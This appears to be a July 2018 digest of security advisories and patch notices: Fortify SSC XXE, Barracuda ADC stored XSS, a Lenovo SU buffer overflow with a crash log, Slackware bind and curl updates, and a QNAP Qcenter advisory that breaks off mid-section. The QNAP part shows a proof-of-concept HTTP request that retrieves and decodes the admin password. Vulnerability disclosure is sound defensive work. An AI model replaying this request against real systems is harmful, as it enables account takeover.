[security bulletin] MFSBGN03811 rev.1 - Fortify Software Security Center (SSC), Multiple vulnerabilities

[cyber-psrt]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03201085

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03201085
Version: 1

MFSBGN03811 rev.1 - Fortify Software Security Center (SSC), Multiple
vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-07-12
Last Updated: 2018-07-12

Potential Security Impact: Remote: Denial of Service (DoS), Disclosure of
Privileged Information, Unauthorized Data Injection

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
An XML external entity (XXE) vulnerability in Fortify Software Security
Center (SSC) allows remote unauthenticated users to read arbitrary files or
conduct server-side request forgery (SSRF) attacks via a crafted DTD in an
XML request.

References:

  - PSRT110617
  - CVE-2018-12463

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Fortify Software Security Center (SSC) v- 17.1, 17.2, 18.1

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


Micro Focus would like to extend a special thanks to Alex Hernandez aka
alt3kx for responsibly disclosing this vulnerability.

RESOLUTION

Apply hotfix to SSC 17.1, 17.2, and 18.1, as applicable.  
(Download hotfix via ftp at
 or, alternatively, go
to Software Support Online at  and
log into your SSO account.)

HISTORY
Version:1 (rev.1) - 12 July 2018 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on 
systems running Micro Focus products should be applied in accordance with the 
customer's 
patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal Micro Focus services support channel. 
For other issues about the content of this Security Bulletin, send e-mail to  
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin 
alerts via Email,  please subscribe here - 
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under 
product and document types.
 Please note that you will need to sign in using a Passport account. If you do 
not have a Passport account yet, you can create one- its free and easy 
https://cf.passport.softwaregrp.com/hppcf/createuser.do 

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to 
maintain system integrity. 
Micro Focus is continually reviewing and enhancing the security features of 
software products to provide 
customers with current secure solutions. 

"Micro Focus is broadly distributing this Security Bulletin in order to bring 
to the attention of users of the 
affected Micro Focus products the important security information contained in 
this Bulletin. Micro Focus recommends 
that all users determine the applicability of this information to their 
individual situations and take appropriate action. 
Micro Focus does not warrant that this information is necessarily accurate or 
complete for all user situations and, consequently, 
Micro Focus will not be responsible for any damages resulting from user's use 
or disregard of the information provided in 
this Security Bulletin. To the extent permitted by law, Micro Focus  disclaims  
all warranties, either express or 
implied, including the warranties of merchantability and fitness for a 
particular purpose, title and non-infringement." 


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions 
contained herein. 
The information provided is provided "as is" without warranty of any kind. To 
the extent permitted by law, 
neither Micro Focus nor its affiliates, subcontractors or suppliers will be 
liable for incidental, special 
or consequential damages including downtime cost; lost profits; damages 
relating to the procurement of 
substitute products or services; or damages for loss of data, or software 
restoration. 
The information in this document is subject to 

Barracuda ADC v5.x - Multiple Persistent Vulnerabilities

[Vulnerability Lab]

Document Title:
===
Barracuda ADC v5.x - Multiple Persistent Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1424


Release Date:
=
2018-07-12


Vulnerability Laboratory ID (VL-ID):

1424


Common Vulnerability Scoring System:

3.8


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

2.000€ - 3.000€


Product & Service Introduction:
===
Ensure Application Scalability,Performance, and Security. The Barracuda
Load Balancer ADC is ideal for organizations looking for
a high-performance, yet cost-effective application delivery and security
solution. With the broadest range of hardware and virtual
models, the Barracuda Load Balancer ADC provides maximum flexibility for
organizations looking to build highly secure and scalable
application infrastructure, whether it’s deployed on-premises or in the
cloud.

(Copy of the Vendor Homepage:
https://www.barracuda.com/products/loadbalancer )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple
persistent input validation web vulnerability in the Barracuda Networks
ADC v5.2.0.004 appliance web-application.


Vulnerability Disclosure Timeline:
==
2018-07-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Barracuda Networks
Product: ADC Load Balancer - Appliance Web Application 5.2.0.004


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

No authentication (guest)


User Interaction:
=
Low User Interaction


Disclosure Type:

Bug Bounty Program


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in
the official Barracuda networks ADC appliance web-application.
The application-side vulnerability allows remote attackers and
privileged user accounts to inject malicious script codes to compromise
the online service web-application.

The application-side input validation web vulnerability is located in
the `last hour`,`last day` and `last week` time duration value of the
traffic statistics module. Local low privileged application user account
can inject malicious script code with persistent attack vector
to the vulnerable to module. The injection point of the issue is the
vulnerable rules add module and the execution of the malicious code
occurs by the restapi (api) in the Dasboard Index module of the
index.cgi file.

The input form of the appliance web-application are filtered. Even if
the input is filtered the internal validation does not encode the input
or restricts the values. Attacker do not need to bypass the filter
validation because the code executes directly through the main service
in the dashboard web content.

The security risk of the persistent input validation web vulnerability
is estimated as medium with a cvss (common vulnerability scoring system)
count of 3.8. Exploitation of the persistent vulnerability in the
`invitation to collaborate` module requires a low privileged heroku account
with low user interaction. Successful exploitation of the vulnerability
results in session hijacking, persistent phishing attacks, persistent
redirect to external source and persistent manipulation of affected or
connected module context.


Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Traffic - Web Umwandlungen

Vulnerable Parameter(s):
[+] last hour (input time duration)
[+] last days (input time duration)
[+] last week (input time duration)

Affected Module(s):
[+] Dasboard - Traffic


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by
remote attackers and local low privileged application user account with
low or medium user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.

Manual steps to reproduce the security vulnerability ...
1. Open the barracuda ADC web-application
2. Surf to the web traffic > web anwendungen module
3. Open the add mode to inject a script code as payload or use the edit
exsiting (payload)
Note: Inject to the last hours, last date and last week input field
4. Now surf back to the main dasboard module
5. The application-side script code execution occurs in the displayed
time duration values
6. Successful reproduce of the persistent security vulnerability!


Vulnerable Module(s): Dashboard > Traffic Statisktiken
Request Method(s): POST


PoC: Link

Lenovo SU v5.07 - Buffer Overflow & Arbitrary Code Execution Vulnerability

[Vulnerability Lab]

Document Title:
===
Lenovo SU v5.07 - Buffer Overflow & Code Execution Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2131

Lenovo Security ID: LEN-19625

https://nvd.nist.gov/vuln/detail/CVE-2018-9063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9063

Acknowledgements: https://support.lenovo.com/us/fr/solutions/len-19625

News & Press References:
https://www.securityweek.com/lenovo-patches-secure-boot-vulnerability-servers
https://securityaffairs.co/wordpress/72335/security/lenovo-security-updates.html

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9063

CVE-ID:
===
CVE-2018-9063


Release Date:
=
2018-07-12


Vulnerability Laboratory ID (VL-ID):

2131


Common Vulnerability Scoring System:

7.8


Vulnerability Class:

Buffer Overflow


Current Estimated Price:

4.000€ - 5.000€


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a local
buffer overflow vulnerability in the official Lenovo SU v5.7.x & v5.6.x.
software.


Vulnerability Disclosure Timeline:
==
2018-05-03: Release Date (Lenovo)
2018-07-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Lenovo
Product: SU (MapDrv - mapdrv.exe) 5.7.19, 5.6.34, 5.6.0.28 & 5.6.0.27


Exploitation Technique:
===
Local


Severity Level:
===
High


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
No User Interaction


Disclosure Type:

Responsible Disclosure Program


Technical Details & Description:

A local buffer overflow and arbitrary code exeuction has been discovered
in the official Lenovo SU v5.7.x & v5.6.x. software.
The vulnerability allows to overwrite the active registers of the
process to compromise the affected software by gaining
higher system access privileges.

MapDrv (C:Program FilesLenovoSystem Update mapdrv.exe) contains a local
vulnerability where an attacker entering very large user ID
or password can overrun the program’s buffer, causing undefined
behaviors, such as execution of arbitrary code. No additional privilege is
granted to the attacker beyond what is already possessed to run MapDrv.
The flaw could be exploited by local attackers for different kind
of attacks, include the execution of arbitrary code on the target machine.

Exploitation of the local buffer overflow vulnerability requires no user
interaction and system user process privileges of the driver.
Successful exploitation of the buffer overflow vulnerability results in
a compromise of the local system process or affected computer system.

Vulnerable Driver:
[+] MapDrv

Affected Process:
[+] mapdrv.exe


Proof of Concept (PoC):
===
The vulnerability can be exploited by local attackers with system
process privileges and without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below.


--- Debug Error Exception Session Log (Exception) ---
(d8c.1988): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=029ab7a0 ebx=0031fe05 ecx=0041 edx=fd974860 esi=029a9d70
edi=0031fd04
eip=00a256b3 esp=0031e54c ebp=0031fc70 iopl=0 nv up ei pl nz na
pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=
efl=00210206
*** ERROR: Module load completed but symbols could not be loaded for
image00a2
image00a2+0x56b3:
00a256b3 66890c02mov word ptr [edx+eax],cx
ds:0023:0032=

--- Debug Session Log [Exception Analysis] ---
FAULTING_IP:
image00a2+56b3
00a256b3 66890c02mov word ptr [edx+eax],cx

EXCEPTION_RECORD:   -- (.exr )
ExceptionAddress: 00a256b3 (image00a2+0x56b3)
   ExceptionCode: c005 (Access violation)
  ExceptionFlags: 
NumberParameters: 2
   Parameter[0]: 0001
   Parameter[1]: 0032
Attempt to write to address 0032

FAULTING_THREAD:  1988
PROCESS_NAME:  image00a2
FAULTING_MODULE: 77ab ntdll
DEBUG_FLR_IMAGE_TIMESTAMP:  594b6578
ERROR_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%08lx
referenced memory at 0x%08lx. The memory could not be %s.
WRITE_ADDRESS:  0032
BUGCHECK_STR:  ACCESS_VIOLATION

IP_ON_HEAP:  00410041
The fault address in not in any loaded module, please check your build's
rebase
log at binbuild_logstimebuildntrebase.log for module which may
contain the address if it were loaded.

DEFAULT_BUCKET_ID:  WRONG_SYMBOLS
FRAME ONE INVALID: 18002a

[slackware-security] bind (SSA:2018-192-01)

[Slackware Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  bind (SSA:2018-192-01)

New bind packages are available for Slackware 14.0, 14.1, 14.2, and -current to
fix security issues.


Here are the details from the Slackware 14.2 ChangeLog:
+--+
patches/packages/bind-9.10.8-i586-1_slack14.2.txz:  Upgraded.
  This update fixes security issues:
  Fixed a bug where extraordinarily large zone transfers caused several
  problems, with possible outcomes including corrupted journal files or
  server exit due to assertion failure.
  Don't permit recursive query service to unauthorized clients.
  For more information, see:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5738
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bind-9.9.13-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bind-9.9.13-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bind-9.9.13-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bind-9.9.13-x86_64-1_slack14.1.txz

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/bind-9.10.8-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/bind-9.10.8-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.13.2-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.13.2-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
3df72fb1579a8c0689314047f43a0a2d  bind-9.9.13-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
4bc232339338d13ff37e81a7c781d26d  bind-9.9.13-x86_64-1_slack14.0.txz

Slackware 14.1 package:
721d903ce5a68d71dcb9801cc658d8c8  bind-9.9.13-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
fb3b6f8b0c6d644624094e0f07429fbd  bind-9.9.13-x86_64-1_slack14.1.txz

Slackware 14.2 package:
82149ea36a5c8364764ee2f04349a24e  bind-9.10.8-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
3f6b151875e2486d262e99b341fb5023  bind-9.10.8-x86_64-1_slack14.2.txz

Slackware -current package:
509e76121146d18f3872db28b4abf98f  n/bind-9.13.2-i586-1.txz

Slackware x86_64 -current package:
87622e82d50313b87c8860960af89d5e  n/bind-9.13.2-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg bind-9.10.8-i586-1_slack14.2.txz

Then, restart the name server:

# /etc/rc.d/rc.bind restart


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++
-BEGIN PGP SIGNATURE-

iEYEARECAAYFAltGjUwACgkQakRjwEAQIjOe6gCfQ0nicbuT5NCcvtzRI+nFiZ+M
xWIAn0GpGwxA1KkquTnWeGZ3tzPzyYeJ
=XqhD
-END PGP SIGNATURE-

[slackware-security] curl (SSA:2018-192-02)

[Slackware Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  curl (SSA:2018-192-02)

New curl packages are available for Slackware 14.0, 14.1, 14.2, and -current to
fix a security issue.


Here are the details from the Slackware 14.2 ChangeLog:
+--+
patches/packages/curl-7.61.0-i586-1_slack14.2.txz:  Upgraded.
  This update fixes a buffer overflow in SMTP send.
  For more information, see:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0500
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/curl-7.61.0-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/curl-7.61.0-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/curl-7.61.0-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/curl-7.61.0-x86_64-1_slack14.1.txz

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/curl-7.61.0-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/curl-7.61.0-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/curl-7.61.0-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/curl-7.61.0-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
fbcfd446b8068e16a43c28ca742f2650  curl-7.61.0-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
21bf24cfa0acd12a8aa7d7e022a2ca17  curl-7.61.0-x86_64-1_slack14.0.txz

Slackware 14.1 package:
37135b04c91293591591e2118d7f3030  curl-7.61.0-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
05c6d3cba63f0bdf13398f67f2a70aad  curl-7.61.0-x86_64-1_slack14.1.txz

Slackware 14.2 package:
b570adabc34d5e79b83fb41220825738  curl-7.61.0-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
ac45db4dd8bed91a4fffcfc34bb117c8  curl-7.61.0-x86_64-1_slack14.2.txz

Slackware -current package:
5c8c2504722db0cddbfa0f6452af5464  n/curl-7.61.0-i586-1.txz

Slackware x86_64 -current package:
3f5d0f918f5d5dc08268e36ed17e9fe6  n/curl-7.61.0-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg curl-7.61.0-i586-1_slack14.2.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++
-BEGIN PGP SIGNATURE-

iEYEARECAAYFAltGjU4ACgkQakRjwEAQIjMBBQCghtpyyZsQIuLr/1q/DhyedQ4X
+4gAn2ljECzyNNA+Vp8h/TGcZZKKHZ/t
=FIzW
-END PGP SIGNATURE-

[CORE-2018-0006] - QNAP Qcenter Virtual Appliance Multiple Vulnerabilities

[Core Security Advisories Team]

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

QNAP Qcenter Virtual Appliance Multiple Vulnerabilities

1. *Advisory Information*

Title: QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2018-0006
Advisory URL:
http://www.coresecurity.com/advisories/qnap-qcenter-multiple-vulnerabilities
Date published: 2018-07-11
Date of last update: 2018-07-11
Vendors contacted: QNAP
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Information Exposure [CWE-200], Command Injection [CWE-77],
Command Injection [CWE-77], Command Injection [CWE-77],
Command Injection [CWE-77]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-0706, CVE-2018-0707, CVE-2018-0708, CVE-2018-0709,
CVE-2018-0710

3. *Vulnerability Description*

QNAP's website states that:

[1] Q'center Virtual Appliance is a central management platform that
enables you to consolidate the management of multiple QNAP NAS. The
Q'center web interface gives you the ease-of-use, cost-efficiency,
convenience and flexibility to manage multiple NAS, across multiple
sites, from any internet browser.

The platform's provides centralized web-based administration to manage
the following features:

- Review HDD S.M.A.R.T. values
- Monitor system status
- Manage apps and shared folders
- Review infographice reports

Multiple vulnerabilities were found in the Q'center Virtual Appliance
web console that would allow an attacker to execute arbitrary commands
on the system.

4. *Vulnerable versions*

. Q'center Virtual Appliance Version 1.6.1056 (20170825)
. Q'center Virtual Appliance Version 1.6.1075 (20171123)
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

QNAP  published the following Security Note:

. https://www.qnap.com/en-us/security-advisory/nas-201807-10

6. *Credits*

These vulnerabilities were discovered and researched by Ivan Huertas
from Core Security Consulting Services. The publication of this advisory
was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

QNAP's Q'center Virtual Appliance web console includes a functionality
that would allow an authenticated attacker to elevate privileges on the
system. We describe this issue in section 7.1.

Sections 7.2, 7.3, 7.4 and 7.5 show different methods to gain command
execution.

7.1. *Privilege escalation*

[CVE-2018-0706]
The application contains an API endpoint that returns information about
the accounts defined in the database. The information returned is
informative for all the users except for the admin user, which cames
with every installation, where an extra field is presented. This extra
field (new_password) contains the password defined at installation time
for the admin user encoded in base64.

Any authenticated user could access this API endpoint and retrieve the
admin user's password, therefore being able to login as an administrator.

The following proof of concept shows a user with viewer access
retrieving the admin's password encoded in base64 in the new_password
field.

/-
GET /qcenter/hawkeye/v1/account?_dc=1519932315271 HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=viewer; CMS_SID=IV4P74Y16X; ROLE=1082130432;
_ID=5a9847223af7e2034924e7b6; LOGIN_TIME=1519932215818; remember=false
Connection: close

HTTP/1.1 200 OK
Date: Thu, 01 Mar 2018 19:23:43 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: application/json
Content-Length: 878
Connection: close

{
"total_count": 2,
"account": [
{
"dst_enable": false,
"name": "admin",
"default": true,
"new_password": "YWRtaW5pc3RyYWRvcg==",
"authentication": 0,
"create_time": {
"$date": 1519917983616
},
"role": 4294967295,
"timezone_code": 17,
"last_login": {
"$date": 1519929869797
},
"_id": "5a981b9f3af7e2030c883592",
"email": "",
"description": "administrator"
},
{
"dst_enable": false,
"name": "viewer",
"register_code": "",
"authentication": 0,
"create_time": {
"$date": 1519929122332
},
"role": 1082130432,
"timezone_code": 17,
"last_login": {
"$date": 1519932215818
},
"_id": "5a9847223af7e2034924e7b6",
"email": "",
"description": ""
}
]
}
-/

As can be seen in the following excerpt, the decoded base64 data
corresponds to the plaintext administrator password set at installation
time.

/-
$ echo YWRtaW5pc3RyYWRvcg== | base64 -d
administrador
-/

7.2. *Command Execution in change password for the admin user*

[CVE-2018-0707]
When the admin user performs a password change, the application